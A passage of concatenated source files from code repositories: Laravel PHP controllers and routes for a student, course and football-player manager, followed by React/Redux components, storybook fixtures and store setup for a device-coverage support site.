return view('courses.index');
}
public function store(Request $request){
$data=$request->validate([
'name'=>[],
'identification'=>[],
'day'=>[],
'start_time'=>[],
'end_time'=>[],
'capacity'=>[]
]);
Course::create($data);
return back();
}
public function destroy(Course $course){
$course->delete();
return back();
}
}
<file_sep><?php
namespace App\Http\Controllers;
use App\Models\Player;
use Illuminate\Http\Request;
class PlayerController extends Controller
{
public function index(){
return view('player.index');
}
public function search(Request $request){
$search_query=$request->get('search_query');
$teams=Player::where('team','LIKE','%'.$search_query.'%')->get();
$heights=Player::where('height','LIKE','%'.$search_query.'%')->get();
$weights = Player::where('weight','LIKE','%'.$search_query.'%')->get();
$numbers = Player::where('number','LIKE','%'.$search_query.'%')->get();
return view('player.search',compact('teams','heights','weights','numbers'));
}
public function store(Request $request){
$data=$request->validate([
'team'=>[],
'name'=>[],
'number'=>[],
'height'=>[],
'weight'=>[]
]);
Player::create($data);
return back();
}
public function edit(Player $player){
return view('player.edit',compact('player'));
}
public function update(Request $request,Player $player){
$data=$request->validate([
'team'=>[],
'name'=>[],
'number'=>[],
'height'=>[],
'weight'=>[]
]);
$player->update($data);
return redirect()->route('player.index');
}
public function destroy(Player $player){
$player->delete();
return back();
}
}
<file_sep><?php
use Illuminate\Support\Facades\Route;
use App\Http\Controllers\CourseController;
use App\Http\Controllers\PlayerController;
use App\Http\Controllers\StudentController;
/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/
Route::get('/', function () {
return view('welcome');
});
Auth::routes();
Route::get('/home', [App\Http\Controllers\HomeController::class, 'index'])->name('home');
Route::get('/students',[StudentController::class,'index'])->name('student.index');
Route::get('/students/{student}',[StudentController::class,'edit'])->name('student.edit');
Route::post('/students/store',[StudentController::class,'store'])->name('student.store');
Route::patch('/students/{student}',[StudentController::class,'update'])->name('student.update');
Route::delete('/students/{student}/delete',[StudentController::class,'destroy'])->name('student.delete');
//student courses
Route::get('/students/{student}/courses',[StudentController::class,'addStudentCourses'])->name('add.student.courses');
Route::post('/student/{student}/course',[StudentController::class,'studentcourse'])->name('student.courses');
Route::get('/student/{student}/schedules',[StudentController::class,'schedules'])->name('schedules');
//course
Route::get('courses',[CourseController::class,'index'])->name('courses.index');
Route::post('courses/store',[CourseController::class,'store'])->name('courses.store');
Route::delete('course/{course}/delete',[CourseController::class,'destroy'])->name('course.delete');
//players
Route::get('/players',[PlayerController::class,'index'])->name('player.index');
Route::get('search',[PlayerController::class,'search'])->name('player.search');
Route::get('player/{player}',[PlayerController::class,'edit'])->name('player.edit');
Route::patch('player/{player}/update',[PlayerController::class,'update'])->name('player.update');
Route::post('player/store',[PlayerController::class,'store'])->name('player.store');
Route::delete('player/{player}/delete',[PlayerController::class,'destroy'])->name('player.delete');
| 7f9853362bb5c944d049087a0ecd66adf86e0e81 | [
"Markdown",
"PHP"
] | 6 | PHP | mysasse001/student-and-course-management-with-fifa-queries | 27e57114abee79ec3d1f6d929830d6ff618ced4a | 76f50ff5d32bc993dcff0389774c364c2d702c1a |
refs/heads/master | <repo_name>dheerajui/React<file_sep>/src/components/CoverageItem/CoverageItem.js
import React from 'react';
import PropTypes from 'prop-types';
import { injectIntl, intlShape } from 'react-intl';
import { formatString } from '../../services/utilities';
import { metrics, EXIT_EVENT } from '../../metrics/AnalyticsService';
import ExtendCoverageButton from '../ExtendCoverageButton';
import { coverageItem as messages } from '../../messages/messages';
import './CoverageItem.scss';
// Endpoint that serves the printable Proof of Coverage (POC); used as the
// POST target of the 2FA form rendered by CoverageItem.
const VIEW_POC_URL = '/agreements/epoc/view/';
// Placeholder embedded in description strings where a serial-number query
// parameter is either substituted (2FA users) or stripped (everyone else).
const SN_PLACEHOLDER = '?sn={0}';
// Placeholder tokens in description strings that get replaced with metrics
// tracking event values before rendering.
const TRACK_MORE_PH = 'track_more';
const TRACK_LEARN_PH = 'track_learn';
// Maps a coverage status key to the CSS classes of its status icon.
// NOTE(review): the trailing space in the `green` value looks accidental but
// is harmless inside a className; preserved to keep rendered output identical.
const STATUS_ICON = {
  green: 'icon icon-checksolid green ',
  yellow: 'icon icon-exclamationsolid yellow',
  blue: 'icon icon-exclamationsolid blue'
};
/**
 * Coverage Section to be displayed on the Product Details page.
 *
 * Renders a status icon, a section title, optional details text (agreement
 * number), a rich-text description, and at most one context-dependent action:
 * view Proof of Coverage, extend coverage, or a section-specific redirect link.
 *
 * @param {Object} intl - intl object provided by react-intl injectIntl
 * @param {Object} coverageData - Object containing the data relevant to the current section
 * @param {Function} [onViewPOCClick] - Handler for when user clicks to view their POC
 * @param {Object} userData - Object containing the current user data
 * @param {string} exitEvent - Metrics event value emitted when the redirect link is clicked
 * @param {Function} [onExtendCoverageClick] - Handler for when user clicks to extend coverage on their device
 * @param {Object} [device] - Object containing data on the current device
 * @param {number} [deviceIndex] - Number representing the index in the device list of the current device
 * @param {string} [agreementsUrl] - Url to deep dive for agreements registration
 * @param {func} [onPurchaseAgreementClick] - Handler for clicking to purchase an agreement
 * @returns {XML}
 * @constructor
 */
const CoverageItem = ({ intl, coverageData, onViewPOCClick, userData, exitEvent,
  onExtendCoverageClick, device, deviceIndex, agreementsUrl, onPurchaseAgreementClick }) => {
  // Pull out every field any coverage-section variant may carry; fields not
  // present for a given section simply destructure to undefined, which the
  // branches below rely on to pick what to render.
  const {
    // Common among all sections
    title,
    description,
    status,
    // agreementsEligibility
    type,
    extendLabel,
    eligibilityType,
    eligibilityRedirectUrl,
    // coverageSummary
    agreementCode,
    agreementNumber,
    viewPocLabel,
    // supportCoverage and repairCoverage
    endDate,
    redirectUrlText,
    redirectUrl
  } = coverageData;
  // Two-factor accounts use a server-rendered POC flow (form POST in a new
  // tab); everyone else gets the in-page modal driven by onViewPOCClick.
  const is2FA = userData && userData.is2FA;
  // Chooses the single action rendered under the description. Priority:
  // view POC > extend coverage > section redirect link > nothing (null).
  const actionLink = () => {
    // Render view POC
    if (viewPocLabel && agreementCode) {
      if (is2FA) {
        // 2FA: POST agreementCode + serialNumberKey to the POC endpoint in a
        // new tab; the exit is tracked via the data-metrics-* attributes.
        return (
          <div className='coverage-actions'>
            <form action={VIEW_POC_URL} method='post' target='_blank'>
              <input type='hidden' name='agreementCode' value={agreementCode} />
              <input type='hidden' name='serialNumberKey' value={device.serialNumberKey} />
              <button
                type='submit'
                className='icon icon-after icon-chevronright section-button'
                data-metrics-event-name={EXIT_EVENT}
                data-metrics-event-value={'Product_Details::Exit_to_2Fac_Coverage_Modal_View'}
              >
                {viewPocLabel}
              </button>
            </form>
          </div>
        );
      }
      // Non-2FA: open the POC modal via the callback (when provided) and
      // record the modal view manually through the metrics service.
      return (
        <div className='coverage-actions'>
          <button
            className='view-poc'
            onClick={e => {
              if (onViewPOCClick) {
                e.preventDefault();
                metrics.trackEvent({
                  page: {
                    content_subtype: 'Product_Details::Coverage_Modal_View'
                  }
                });
                onViewPOCClick(agreementCode);
              }
            }}
          >
            {viewPocLabel}
          </button>
        </div>
      );
    // Render extend coverage button
    } else if (extendLabel) {
      return (
        <div className='coverage-actions'>
          <ExtendCoverageButton
            onOpenModalClick={onExtendCoverageClick}
            deviceInfo={device}
            deviceIndex={deviceIndex}
            eligibility={{ type, extendLabel, eligibilityType, eligibilityRedirectUrl }}
            agreementsUrl={agreementsUrl}
            onPurchaseAgreementClick={onPurchaseAgreementClick}
          />
        </div>
      );
    // Render button specific to the section
    } else if (redirectUrlText) {
      return (
        <div className='coverage-actions'>
          <a
            href={redirectUrl}
            target='_blank'
            data-metrics-event-name={EXIT_EVENT}
            data-metrics-event-value={exitEvent || 'exit to cas'}
            className='icon icon-after icon-chevronright section-button'
          >
            {redirectUrlText}
          </a>
        </div>
      );
    }
    return null;
  };
  // Return any text that would appear above the description. Usually expiration or agreement number
  const detailsText = () => {
    if (agreementNumber) {
      return (
        <div className='coverage-details-text'>
          {intl.formatMessage(messages.agreementNumber)}: {agreementNumber}
        </div>
      );
    }
    return null;
  };
  // Intl.DateTimeFormat options used when substituting endDate into the
  // description (e.g. "February 18, 2017" in en_US).
  const dateOptions = {
    year: 'numeric',
    month: 'long',
    day: 'numeric'
  };
  // Produces the final description HTML string:
  //  1. replaces track_learn/track_more placeholders with metrics values,
  //  2. then substitutes {0} with the localized endDate when present,
  //  3. otherwise fills or strips the ?sn={0} serial-number placeholder
  //     depending on 2FA status.
  // NOTE(review): the result is injected via dangerouslySetInnerHTML below —
  // presumably the description comes from trusted localized content; confirm.
  const descriptionReplaced = () => {
    const updatedDescription = (description &&
      (description.includes(TRACK_MORE_PH) || description.includes(TRACK_LEARN_PH)))
      ? formatString(description, {
        [TRACK_LEARN_PH]: 'Product_Details::Exit_to_Learn_Product_Coverage',
        [TRACK_MORE_PH]: 'Product_Details::Exit_to_More_About_AC'
      })
      : description;
    if (endDate) {
      return formatString(updatedDescription, {
        0: intl.formatDate(new Date(endDate), dateOptions)
      });
    } else if (updatedDescription && updatedDescription.includes(SN_PLACEHOLDER)) {
      return is2FA
        ? formatString(updatedDescription, {
          0: device.maskedSerialNumber
        })
        : updatedDescription.replace(SN_PLACEHOLDER, '');
    }
    return updatedDescription;
  };
  // Layout: status icon | (subheader, details + description, action link).
  return (
    <div className='coverage-item'>
      <span className={`coverage-icon ${STATUS_ICON[status]}`} />
      <div className='coverage-details'>
        <div className='coverage-subheader'>
          <h3>{title}</h3>
        </div>
        <div className='coverage-details-wrapper'>
          {detailsText()}
          <div className='coverage-description' dangerouslySetInnerHTML={{ __html: descriptionReplaced() }} />
        </div>
        {actionLink()}
      </div>
    </div>
  );
};
// Runtime prop validation. `intl` is supplied by the injectIntl HOC below,
// not by callers of the exported component.
CoverageItem.propTypes = {
  intl: intlShape.isRequired,
  coverageData: PropTypes.object.isRequired,
  onViewPOCClick: PropTypes.func,
  onExtendCoverageClick: PropTypes.func,
  userData: PropTypes.object.isRequired,
  device: PropTypes.object,
  deviceIndex: PropTypes.number,
  agreementsUrl: PropTypes.string,
  exitEvent: PropTypes.string,
  onPurchaseAgreementClick: PropTypes.func
};
// Explicit defaults for every optional prop declared above.
CoverageItem.defaultProps = {
  onViewPOCClick: undefined,
  onExtendCoverageClick: undefined,
  device: {},
  deviceIndex: 0,
  agreementsUrl: '',
  exitEvent: '',
  onPurchaseAgreementClick: undefined
};
// Wrap with injectIntl so react-intl provides the `intl` prop automatically.
export default injectIntl(CoverageItem);
<file_sep>/src/components/CoverageList/__stories__/CoverageList.js
import React from 'react';
import { storiesOf } from '@storybook/react';
import CoverageList from '../CoverageList';
// Storybook fixture for <CoverageList />: a device record, a coverage payload
// shaped like the store's coverage slice, and a minimal (non-2FA) user record.
const coverageList = {
  device: {
    browserClientImage: 'https://km.support.apple.com/kb/securedImage.jsp?configcode=GRY5',
    color: 'c8caca',
    currentDevice: false,
    deviceClass: 'iPhone',
    deviceNotSupported: false,
    eligibleProductId: '100099',
    enclosureColor: 'e5bdb5',
    // Sparse placeholder: an empty array of length 3, not three image entries.
    images: Array(3),
    maskedSerialNumber: '•••••••0GRY5',
    model: 'iPhone8,1',
    modelName: 'iPhone 6s',
    nickName: '<NAME>',
    prettyProductName: 'iPhone 6s',
    prodFamilyClassId: 'PFC3001',
    prodFamilyClassName: 'iPhone',
    prodGroupFamilyId: 'PGF31005',
    prodGroupFamilyName: 'iPhone 6',
    productName: 'IPHONE 6S',
    serialNumberKey: '<KEY>',
    superGroupId: 'SG003',
    superGroupName: 'iPhone'
  },
  coverageData: {
    currentlyFetching: 0,
    isFetching: false,
    didInvalidate: false,
    coverage: ['NONE'],
    // Per-section coverage payload; descriptions hold content keys that are
    // resolved to localized copy elsewhere.
    data: {
      notificationItem: false,
      coverageInfo: {},
      purchaseDateInfo: {
        purchaseDate: '2016-02-19',
        title: 'Valid Purchase Date',
        description: 'KEYNAME[cc.registered.UNKNOWN_PRODUCT][ContentTBD]',
        status: 'green'
      },
      agreementsEligibility: {},
      supportCoverage: {
        covered: false,
        coveredBy: 'NONE',
        expiryMessage: 'Estimated Expiration Date: {0}',
        title: 'Telephone Technical Support: Expired',
        description: 'KEYNAME[cc.support.SG003.NOPS_PPI][ContentTBD]',
        status: 'yellow',
        redirectUrl: 'https://getsupport-uatb.apple.com?sn=590a441abb2fe5a082f05625&locale=en_US',
        redirectUrlText: 'Contact Apple Support'
      },
      repairCoverage: {
        covered: false,
        coveredBy: 'NONE',
        endDate: '2017-02-18',
        expiryMessage: 'Estimated Expiration Date: {0}',
        title: 'Repairs and Service Coverage: Expired',
        description: 'KEYNAME[cc.repair.SG003.OO][ContentTBD]',
        status: 'yellow',
        redirectUrl: 'https://getsupport-uatb.apple.com?sn=590a441abb2fe5a082f05625&locale=en_US',
        redirectUrlText: 'Set up a repair'
      }
    }
  },
  userData: {
    email: '<EMAIL>',
    firstName: 'Test',
    is2FA: false,
    lastName: 'User'
  }
};
// Single story rendering CoverageList with the mock fixture defined above.
storiesOf('Coverage List', module)
  .add('Coverage List Items', () => (
    <CoverageList
      coverage={coverageList.coverageData}
      userData={coverageList.userData}
      device={coverageList.device}
    />
  ));
<file_sep>/src/routes/ShippingLabel/containers/ShippingLabelContainer.js
import { connect } from 'react-redux';
import { shippingLabelDataLoaded, trackPageView } from '../../../modules/shippinglabel';
import ShippingLabel from '../components/ShippingLabel';
// Builds the callback props handed to <ShippingLabel /> by connect().
const mapDispatchToProps = dispatch => {
  // Persist the parsed shipping-label payload into the store.
  const onDataLoaded = data => { dispatch(shippingLabelDataLoaded(data)); };
  // NOTE(review): trackPageView is invoked directly rather than dispatched —
  // presumably a plain analytics side effect, not an action creator; confirm
  // against modules/shippinglabel.
  const handleTrackPageView = () => { trackPageView(); };
  return { onDataLoaded, trackPageView: handleTrackPageView };
};
// Selects the shipping-label slice of the store and exposes exactly its four
// display fields as props for <ShippingLabel />.
const mapStateToProps = state => {
  const { barcodeData, dispatchId, shippingAddress, returnAddress } = state.shippingLabelData;
  return { barcodeData, dispatchId, shippingAddress, returnAddress };
};
export default connect(mapStateToProps, mapDispatchToProps)(ShippingLabel);
<file_sep>/src/components/Address/__stories__/Address.js
import React from 'react';
import { storiesOf } from '@storybook/react';
import Address from '../Address';
import ADDRESS_DATA from '../../../__mock__/shipping-label.json';
storiesOf('Address', module)
.add('With full address data', () => (
<Address {...ADDRESS_DATA.shippingAddress} />
))
.add('With no country field', () => (
<Address {...{
address1: '30 Pearson St',
address2: 'APT#301',
city: 'Charlestown',
state: 'NSW',
postalCode: '2290'
}}
/>
))
.add('With emptry street2 field', () => (
<Address {...{
streetAddress: '30 Pearson St',
streetAddress2: '',
city: 'Charlestown',
state: 'NSW',
postalCode: '2290',
country: 'Australia'
}}
/>
))
.add('With no address data', () => (
<Address />
));
<file_sep>/src/components/CoverageItem/index.js
// Barrel file: re-export the CoverageItem component for shorter import paths.
import CoverageItem from './CoverageItem';

export default CoverageItem;
<file_sep>/src/store/createStore.js
import { applyMiddleware, compose, createStore } from 'redux';
import thunk from 'redux-thunk';
import { browserHistory } from 'react-router';
import metricsMiddleware from '../metrics/MetricsMiddleware';
import makeRootReducer from './reducers';
import { updateLocation } from './location';
import { fetchCsrfToken } from './csrf';
/**
 * Creates and configures the Redux store.
 *
 * Wiring (in order): thunk + metrics middleware, an optional Redux DevTools
 * enhancer (dev only), a registry for route-injected async reducers, a
 * history listener that updates `location` state and refreshes the CSRF
 * token on navigation, and hot module replacement for reducers.
 *
 * @param {Object} [initialState={}] - State preloaded by the server/page.
 * @returns {Object} The configured Redux store.
 */
export default (initialState = {}) => {
  // ======================================================
  // Middleware Configuration
  // ======================================================
  const middleware = [thunk, metricsMiddleware];

  // ======================================================
  // Store Enhancers
  // ======================================================
  const enhancers = [];
  if (__DEV__) {
    // Attach the Redux DevTools browser extension when installed.
    const devToolsExtension = window.devToolsExtension;
    if (typeof devToolsExtension === 'function') {
      enhancers.push(devToolsExtension());
    }
  }

  // ======================================================
  // Store Instantiation and HMR Setup
  // ======================================================
  const store = createStore(
    makeRootReducer(),
    initialState,
    compose(
      applyMiddleware(...middleware),
      ...enhancers
    )
  );
  // Registry for reducers injected later by individual routes.
  store.asyncReducers = {};

  // To unsubscribe, invoke `store.unsubscribeHistory()` anytime
  store.unsubscribeHistory = browserHistory.listen(nextLocation => {
    updateLocation(store)(nextLocation);
    // Refresh the CSRF token on every route change.
    fetchCsrfToken()(store.dispatch);
  });

  if (module.hot) {
    // Swap in the updated root reducer (plus any async reducers) on HMR.
    module.hot.accept('./reducers', () => {
      const reducers = require('./reducers').default; // eslint-disable-line global-require
      store.replaceReducer(reducers(store.asyncReducers));
    });
  }

  return store;
};
<file_sep>/src/routes/AllHistory/components/AllHistory.js
import PropTypes from 'prop-types';
import React from 'react';
import { metrics } from '../../../metrics/AnalyticsService';
import Divider from '../../../components/Divider';
import AllActivityList from '../../../components/ActivityList/AllActivityList';
import NeedMoreHelp from '../../../components/NeedMoreHelp';
import PageTitle from '../../../components/PageTitle';
import NavigationLink from '../../../components/NavigationLink';
import RepairLookupSection from '../../../components/RepairLookupSection';
import { allHistory as messages } from '../../../messages/messages';
import './AllHistory.scss';
/**
 * Page component listing all of the user's activities, plus a repair-lookup
 * form and a "need more help" section. Fires an analytics page view on mount.
 *
 * Props:
 * @param {Object} activityData - Activity slice of the Redux store.
 * @param {Function} onActivityListMount - Called when the list mounts (triggers the initial fetch).
 * @param {Function} onNextPageClick - Loads the next page of activities.
 * @param {Function} onLookupFormSubmit - Handles repair-lookup submissions.
 * @return {XML}
 * @class
 */
class AllHistory extends React.Component {
  componentDidMount() {
    // Track the page view once per mount.
    metrics.trackPage({
      page: {
        content_subtype: 'History::Main'
      }
    });
  }

  render() {
    const { activityData, onActivityListMount, onNextPageClick, onLookupFormSubmit } = this.props;
    return (
      <div className='all-history-page'>
        <div className='heading content-area'>
          <PageTitle title={{ ...messages.pageTitle, tagName: 'h1' }} />
          <NavigationLink />
        </div>
        <section className='all-activities content-area narrow-content'>
          <AllActivityList
            activityData={activityData}
            onMount={onActivityListMount}
            onNextPageClick={onNextPageClick}
          />
        </section>
        <Divider />
        <section className='lookup content-area'>
          <RepairLookupSection onLookupFormSubmit={onLookupFormSubmit} />
        </section>
        <Divider />
        <section className='content-area'>
          <NeedMoreHelp />
        </section>
      </div>
    );
  }
}
// Runtime prop contract; the container supplies all four props.
AllHistory.propTypes = {
  activityData: PropTypes.object.isRequired,
  onNextPageClick: PropTypes.func.isRequired,
  onActivityListMount: PropTypes.func.isRequired,
  onLookupFormSubmit: PropTypes.func.isRequired
};

export default AllHistory;
<file_sep>/src/main.js
/* eslint-disable global-require, import/no-dynamic-require */
import React from 'react';
import ReactDOM from 'react-dom';
import { addLocaleData } from 'react-intl';
import { getValue } from './services/object';
import createStore from './store/createStore';
import AppContainer from './containers/AppContainer';
import updateMessages, { fetchingTranslations } from './store/intl';
import { fetchOmnitureProps } from './metrics/AnalyticsService';
import config from './services/intlConfig';
import 'babel-polyfill'; // eslint-disable-line import/first, Must be loaded after React and ReactDOM for use with IE
require('es6-promise').polyfill();
// ========================================================
// Initial state construction
// ========================================================
// Get the locale information from initial state, and update it as necessary
// NOTE(review): the global is read with THREE leading underscores
// ('___INITIAL_STATE__'); confirm this matches the name the server injects.
const windowState = getValue('___INITIAL_STATE__', window, {});
const language = getValue('page.locale.languageCode', windowState, 'en');
const countryCode = getValue('page.locale.countryCode', windowState, 'US');
// Locales unsupported by react-intl are remapped to a fallback language.
const mappedLanguage = config.unsupportedLocales[`${language}-${countryCode}`];
const languageToLoad = mappedLanguage || language;
const initialState = Object.assign({}, windowState,
  {
    intl: Object.assign({}, windowState.intl, { locale: `${languageToLoad}-${countryCode}` })
  }
);

// ========================================================
// Store Instantiation
// ========================================================
const store = createStore(initialState);
const locale = getValue('intl.locale', initialState, 'en-US');
// Backend expects underscore-separated locales (e.g. en_US).
const backendLocale = `${language}_${countryCode}`;

// request translations
// Viewport width decides which translation variant (mobile/desktop) is requested.
const deviceWidth = window.innerWidth;

// Split localization data into its own package, with individual files for each language. Load locale data and then
// make API call for translations
store.dispatch(fetchingTranslations(true));
import(/* webpackChunkName: "i18n/[request]" */ `react-intl/locale-data/${languageToLoad}`)
  .then(localeData => {
    addLocaleData([...localeData]);
    store.dispatch(updateMessages({
      serviceEndpoint: config.intl.endpoint,
      pageName: getValue('page.name', initialState),
      locale,
      backendLocale,
      deviceType: deviceWidth <= 735 ? 'mobile' : 'desktop'
    }));
  })
  .catch(() => {
    console.error('Unable to load language data. Defaulting to English.');
    store.dispatch(updateMessages({
      serviceEndpoint: config.intl.endpoint,
      pageName: getValue('page.name', initialState),
      locale: 'en', // Default locale to 'en' if the locale data loading failed
      backendLocale,
      deviceType: deviceWidth <= 735 ? 'mobile' : 'desktop'
    }));
  });

// Load omniture properties
fetchOmnitureProps(backendLocale);
// ========================================================
// Render Setup
// ========================================================
// DOM element the React tree mounts into.
const MOUNT_NODE = document.getElementById('root');

/**
 * Loads the route tree (via require, so HMR picks up replacements) and
 * renders the app into the mount node.
 */
const renderApp = () => {
  const routes = require('./routes/index').default(store);
  ReactDOM.render(
    <AppContainer routes={routes} store={store} />,
    MOUNT_NODE
  );
};
/**
 * Renders the application. In development with HMR enabled, rendering is
 * wrapped in try/catch so runtime errors surface in a RedBox overlay;
 * otherwise the app is rendered directly.
 *
 * Fix: previously a dev build WITHOUT module.hot rendered nothing at all,
 * because renderApp() was only called inside the `if (module.hot)` branch.
 */
const render = () => {
  if (__DEV__ && module.hot) {
    const renderError = error => {
      const RedBox = require('redbox-react').default;
      ReactDOM.render(<RedBox error={error} />, MOUNT_NODE);
    };

    // Wrap render in try/catch
    try {
      renderApp();
    } catch (error) {
      renderError(error);
    }
  } else {
    renderApp();
  }
};
// ========================================================
// Developer Tools Setup
// ========================================================
// This code is excluded from production bundle
if (__DEV__) {
  if (module.hot) {
    // Setup hot module replacement
    module.hot.accept('./routes/index', () =>
      setImmediate(() => {
        // Unmount first so the replacement route tree mounts cleanly.
        ReactDOM.unmountComponentAtNode(MOUNT_NODE);
        render();
      })
    );
  }
}
/*eslint-disable*/
// Suppress noisy "[React Intl] Missing message" warnings in non-prod builds.
// Fix: the first console.error argument is not always a string (React often
// passes Error objects); calling .indexOf on it threw a TypeError and broke
// all such console.error calls. Guard with a typeof check first.
if (!__PROD__) {
  const originalConsoleError = console.error;
  if (console.error === originalConsoleError) {
    console.error = (...args) => {
      if (typeof args[0] === 'string' && args[0].indexOf('[React Intl] Missing message:') === 0) {
        return;
      }
      originalConsoleError.call(console, ...args);
    };
  }
}
/*eslint-enable*/
// ========================================================
// Go!
// ========================================================
// But first make sure that we polyfill Intl if needed
if (!global.Intl) {
  // Load the Intl polyfill in its own webpack chunk, then render.
  require.ensure([
    'intl'
  ], require => {
    require('intl');
    render();
  }, 'intl-polyfill');
} else {
  render();
}
<file_sep>/src/components/Address/Address.js
import React from 'react';
import PropTypes from 'prop-types';
import './Address.scss';
/**
* Renders the user's address based on all available information
* @param {string} [firstName]
* @param {string} [lastName]
* @param {string} [orgName]
* @param {string} [address1]
* @param {string} [address2]
* @param {string} [city]
* @param {string} [state]
* @param {string} [postal]
* @param {string} [country]
* @returns {XML}
* @constructor
*/
const Address = ({ firstName, lastName, orgName, address1, address2, city, state, postal, country }) => {
const getAddressField = (field, props) => (field ? <div {...props}>{field}</div> : '');
return (
<div className='address'>
{ getAddressField(firstName, { className: 'first-name' }) }
{ getAddressField(lastName, { className: 'last-name' }) }
{ getAddressField(orgName, { className: 'org-name' }) }
{ getAddressField(address1, { className: 'street-address' }) }
{ getAddressField(address2, { className: 'street-address' }) }
{ getAddressField(city, { className: 'city' }) }
{ getAddressField(state, { className: 'state' }) }
{ getAddressField(postal, { className: 'postal-code' }) }
{ getAddressField(country, { className: 'country' }) }
</div>
);
};
// All fields are optional strings; an empty field simply renders no line.
Address.propTypes = {
  firstName: PropTypes.string,
  lastName: PropTypes.string,
  orgName: PropTypes.string,
  address1: PropTypes.string,
  address2: PropTypes.string,
  city: PropTypes.string,
  state: PropTypes.string,
  postal: PropTypes.string,
  country: PropTypes.string
};

// Default everything to '' so destructuring never yields undefined.
Address.defaultProps = {
  firstName: '',
  lastName: '',
  orgName: '',
  address1: '',
  address2: '',
  city: '',
  state: '',
  postal: '',
  country: ''
};

export default Address;
<file_sep>/src/components/CoverageItem/__stories__/CoverageItem.js
import React from 'react';
import { storiesOf } from '@storybook/react';
import CoverageItem from '../CoverageItem';
// Mock coverage entries: [0] has no status icon (empty status),
// [1] carries a yellow (warning) status with a support redirect link.
const coverage = [
  {
    description: 'Eligible for an AppleCare product',
    purchaseDate: '2016-02-19',
    status: '',
    title: 'Valid Purchase Date'
  },
  {
    covered: false,
    coveredBy: 'NONE',
    description: 'Telephone Technical Support: Active',
    expiryMessage: 'Estimated Expiration Date: {0}',
    redirectUrl: 'https://getsupport-uatb.apple.com?sn=590a441abb2fe5a082f05625&locale=en_US',
    redirectUrlText: 'Contact Apple Support',
    status: 'yellow',
    title: 'Telephone Technical Support: Expired'
  }
];

storiesOf('Coverage Item', module)
  .add('With Warning icon', () => (
    <CoverageItem coverageData={coverage[1]} />
  ))
  .add('Without any status icon', () => (
    <CoverageItem coverageData={coverage[0]} />
  ));
<file_sep>/src/components/ActivityList/AllActivityList.js
import React from 'react';
import PropTypes from 'prop-types';
import { FormattedMessage } from 'react-intl';
import { metrics } from '../../metrics/AnalyticsService';
import ActivityItem from '../ActivityItem';
import { focusElement } from '../../services/utilities';
import { allActivityList as messages } from '../../messages/messages';
import './ActivityList.scss';
/**
 * Id prefix for selecting for accessibility.
 * Combined with the item index to form each activity item's DOM id.
 * @type {string}
 * @constant
 * @memberOf ActivityList
 */
const ITEM_ID_PREFIX = 'activity-item-';
/**
 * Handles rendering of all the user's available activity. Includes pagination.
 * @param {Object} activityData - Object containing activity data from redux store
 * @param {Function} onNextPageClick - Handler for loading more activity
 * @param {Function} onMount - Function to be called when the component is first mounted
 * @class
 */
class AllActivityList extends React.Component {
  componentDidMount() {
    // Let the container trigger the initial fetch.
    this.props.onMount();
  }

  componentDidUpdate() {
    // a11y: after a "see more" page loads, move focus to the heading of the
    // first newly appended item (index = number of cases before this batch).
    if (this.props.activityData.fetchingMore) return;
    const newItem = document.querySelector(`#${ITEM_ID_PREFIX}${this.props.activityData.prevNumOfCases} h2`);
    if (!newItem) return;
    // Small delay so VoiceOver reliably picks up the focus change.
    window.setTimeout(() => {
      focusElement(newItem);
    }, 100);
  }

  // Paging control: spinner while a page is loading, a "see more" button
  // when the server has more records, or an empty placeholder otherwise.
  getShowMoreButton(moreRecords, onNextPageClick, fetchingMore) {
    if (fetchingMore) {
      // show a spinner
      return <div className='fetching-more loading' />;
    } else if (moreRecords) {
      // Show more button
      return this.seeMoreElement(onNextPageClick, messages.seeMore);
    }
    // Don't show a button at all
    return <div className='empty-area' />;
  }

  // Main content: spinner, the populated list with its paging control,
  // or a "no history" message.
  getActivityListContent() {
    const { activityData, onNextPageClick } = this.props;
    const isFetching = activityData.isFetching;
    const fetchingMore = activityData.fetchingMore;
    const activityList = activityData.cases;
    if (isFetching) {
      return <div className='loading' />;
    }
    if (activityList && activityList.length) {
      const bookmark = activityData.bookmark;
      const moreRecords = activityData.moreRecords;
      return (
        <div className='activity-list'>
          {this.allActivityList(activityList)}
          {this.getShowMoreButton(moreRecords, () => { onNextPageClick(bookmark); }, fetchingMore)}
        </div>
      );
    }
    return (
      <div className='activity-list'>
        <div className='no-history'><FormattedMessage {...messages.noData} /></div>
      </div>
    );
  }

  // Renders every activity item; ids are indexed so componentDidUpdate can
  // focus the first item of a newly appended page.
  allActivityList(activityList) {
    return (
      <div className='activity-wrapper'>
        {activityList.map((activityData, i) => (
          <ActivityItem
            activityData={activityData}
            key={activityData.caseId}
            id={ITEM_ID_PREFIX + i}
            allActivities
          />
        ))}
      </div>
    );
  }

  // "See more" button; reports the expand interaction to analytics before
  // delegating to the supplied handler.
  seeMoreElement(handler, message) {
    return (
      <div className='see-more-link'>
        <button
          aria-expanded='false'
          aria-controls='activity-list'
          onClick={() => {
            metrics.trackEvent({
              page: {
                content_subtype: 'Expand::History History Page'
              }
            });
            handler();
          }}
        >
          <FormattedMessage {...message} />
        </button>
      </div>
    );
  }

  render() {
    return this.getActivityListContent();
  }
}
// Runtime prop contract; the container supplies all three props.
AllActivityList.propTypes = {
  activityData: PropTypes.object.isRequired,
  onNextPageClick: PropTypes.func.isRequired,
  onMount: PropTypes.func.isRequired
};

export default AllActivityList;
<file_sep>/src/modules/activities.js
/**
* Redux actions and handlers related to activity and case data
* @module activities
*/
import fetchService from '../services/fetchService';
import { getNotificationItems } from '../services/notificationService';
import { serverErrorMessage } from '../messages/messages';
import { actions as modalActions } from '../modules/errorsmodal';
/**
 * Constants
 */
// Redux action type identifiers for the activity module.
export const REQUEST_ACTIVITIES = 'REQUEST_ACTIVITIES';
export const REQUEST_MORE_ACTIVITIES = 'REQUEST_MORE_ACTIVITIES';
export const RECEIVE_ACTIVITIES = 'RECEIVE_ACTIVITIES';
export const SEE_MORE_NOTIFICATIONS = 'SEE_MORE_NOTIFICATIONS';
export const RESET_NOTIFICATIONS = 'RESET_NOTIFICATIONS';
export const SEE_MORE_ACTIVITY = 'SEE_MORE_ACTIVITY';

// Real endpoint in production builds; local json-server mock otherwise.
const ACTIVITY_API_URL = __PROD__
  ? '/api/v1/supportaccount/activity/history'
  : `http://${__JSON_HOST__}:3004/mycases`;

// Payload dispatched when a fetch fails; the reducer stores `error: true`.
const FETCH_ERROR_DATA = {
  error: true
};
/**
 * Actions
 */

/**
 * Builds the action marking the initial activity fetch as started.
 * @return {Object} action
